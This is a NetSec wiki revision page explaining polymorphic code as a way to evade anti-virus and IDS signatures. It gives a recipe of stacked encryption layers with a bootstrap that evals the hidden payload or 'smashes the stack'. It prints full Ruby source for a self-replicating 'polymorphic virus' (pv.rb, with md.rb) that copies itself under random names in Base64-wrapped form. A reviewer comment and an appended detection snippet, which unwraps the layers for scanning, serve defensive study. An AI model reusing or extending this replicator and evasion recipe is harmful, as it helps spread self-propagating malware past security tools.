Difference between revisions of "Polymorphic"
From NetSec
Gonzalo58T (Talk | contribs) |
Gonzalo58T (Talk | contribs) (→md.rb (utility functions)) |
||
Line 55: | Line 55: | ||
== md.rb (utility functions) == | == md.rb (utility functions) == | ||
<pre> | <pre> | ||
− | + | require 'base64'; | |
− | if (!defined?( | + | if (!defined?(MD_LOADED)) |
− | + | def deterministicKeygen(theKey) | |
+ | r = Random.new(theKey.to_i); | ||
+ | return r.rand(3)+3; | ||
end | end | ||
− | + | def mencrypt(str, theKey) | |
− | + | k = deterministicKeygen(theKey) | |
− | def | + | k.times do |
− | + | str = Base64.encode64(str) | |
− | + | end | |
− | + | return str | |
− | + | end | |
− | + | def mdecrypt(str, theKey) | |
− | + | k = deterministicKeygen(theKey) | |
− | + | k.times do | |
− | + | str = Base64.decode64(str) | |
− | + | end | |
− | + | return str | |
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
end | end | ||
− | + | MD_LOADED=true | |
− | + | end | |
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
− | + | ||
</pre> | </pre> |
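Review bot: the functions added in this hunk are named mencrypt/mdecrypt, but nothing in them is encryption: deterministicKeygen turns the key into a round count of 3 to 5 and each round is a plain Base64.encode64 / Base64.decode64, so the key never enters the transformation and the output carries no secret at all; a scanner that base64-decodes repeatedly recovers the original payload unchanged, so the article should not describe this wrapping as encryption. Minor style point for the same lines: the trailing semicolons on `require 'base64';`, `r = Random.new(theKey.to_i);` and `return r.rand(3)+3;` are unnecessary in Ruby.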
Revision as of 22:26, 9 November 2011
Adj. referring to self-modifying code.
Reasons to write polymorphic code
The main reason to write polymorphic code is to avoid being identified by hash or by code signature: an IDS or anti-virus product will not recognise the payload when it is wrapped up in an encrypted form. Another reason is to propagate the code as multiple copies that do not share a signature.
Techniques of polymorphic code writing
- Define a stackable set of encrypting/decrypting functions, preferably working with an encryption key. Call these sets d and e (decryption / encryption), and let there be two integers n, m with n > m such that d[n](d[n-1](...d[m](e[n](e[n-1](...e[m](code)...)))...)) == code
Note: you can write a single function or a pair of functions and vary them with a series of keys (ideally output by a deterministic key generator), as long as your encryption remains reversible.
- Write your payload code (the code you want to hide). At the end of this code, put a bootstrap that will decrypt and run the code (in PHP/Ruby/Perl/whatnot, eval it; in C, smash the stack with it; in C#, use reflection). At the beginning of your payload code, call your encryption/duplication code.
Example in Ruby
pv.rb (polymorphic virus)
<pre>
#!/usr/bin/env ruby1.9.1
if (!defined?(FILE))
  FILE = File.basename(__FILE__)
end
load "md.rb"
#require "FileUtils"

def selfCopy(key)
  code = ""
  newkey = deterministicKeygen(key)
  # read this script's own source; File.foreach closes the handle for us
  File.foreach(FILE) do |l|
    code += l
  end
  code = mencrypt(code, key)
  # define new file name
  fn = rand(128).to_s + 'copy.rb'
  File.open(fn, 'w+') do |f|
    f.write('load "md.rb";' + "\n")
    # this is needed because __FILE__ isn't to be found in eval
    f.write("if (!defined?(FILE))\n\tFILE=__FILE__;\nend;\n")
    f.write('code="' + code + '";' + "\n")
    f.write('eval(mdecrypt(code, ' + key.to_s + '))')
  end
  return newkey
end

# initial key is 42, D.A. told me
key = 42
# malicious section
# first, replicate
key = selfCopy(key)
# then do evil!
puts "Hello, it's savitri"
</pre>
md.rb (utility functions)
<pre>
require 'base64'
if (!defined?(MD_LOADED))
  # derives the next key from the current one; also used as the round count
  def deterministicKeygen(theKey)
    r = Random.new(theKey.to_i)
    return r.rand(3) + 3
  end

  # "encrypt" = apply Base64 encoding k times, k chosen by the key
  def mencrypt(str, theKey)
    k = deterministicKeygen(theKey)
    k.times do
      str = Base64.encode64(str)
    end
    return str
  end

  # "decrypt" = strip the same number of Base64 layers
  def mdecrypt(str, theKey)
    k = deterministicKeygen(theKey)
    k.times do
      str = Base64.decode64(str)
    end
    return str
  end

  MD_LOADED = true
end
</pre>
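The md.rb scheme above (and the stacked d/e technique it instantiates) only layers Base64 three to five times, so a scanner can peel the layers and match the original payload signature. The following is an added detection example, not code from the page or from md.rb: `layered_base64` stands in for mencrypt to build a constructed sample, and `unwrap_base64` and `matches_signature?` are hypothetical names.

```ruby
require 'base64'

# Assumed stand-in for the page's mencrypt: wrap str in `rounds` Base64 layers
# (md.rb picks rounds = Random.new(key).rand(3) + 3, i.e. 3..5).
def layered_base64(str, rounds)
  rounds.times { str = Base64.encode64(str) }
  str
end

# Defender side: peel Base64 layers while the text is still valid Base64 and the
# decoded bytes are still printable text; returns [innermost text, layers peeled].
def unwrap_base64(blob, max_depth = 16)
  depth = 0
  current = blob
  while depth < max_depth
    stripped = current.delete("\n")
    break unless stripped =~ /\A[A-Za-z0-9+\/]+={0,2}\z/ && stripped.length % 4 == 0
    decoded = Base64.strict_decode64(stripped).force_encoding('UTF-8')
    # Binary output means this was the payload, not another Base64 layer
    break unless decoded.valid_encoding? && decoded =~ /\A[[:print:]\s]*\z/
    current = decoded
    depth += 1
  end
  [current, depth]
end

# Signature check: the known marker must appear after at least one layer is removed
def matches_signature?(blob, marker)
  plain, depth = unwrap_base64(blob)
  depth > 0 && plain.include?(marker)
end

# Constructed sample payload (not the page's pv.rb), wrapped in 4 layers
SAMPLE_PAYLOAD = "puts \"Hello, it's savitri\"\n"
SAMPLE_BLOB = layered_base64(SAMPLE_PAYLOAD, 4)
```

Because the key only selects the layer count, the same unwrapping loop recovers the payload for every key the page's generator can produce.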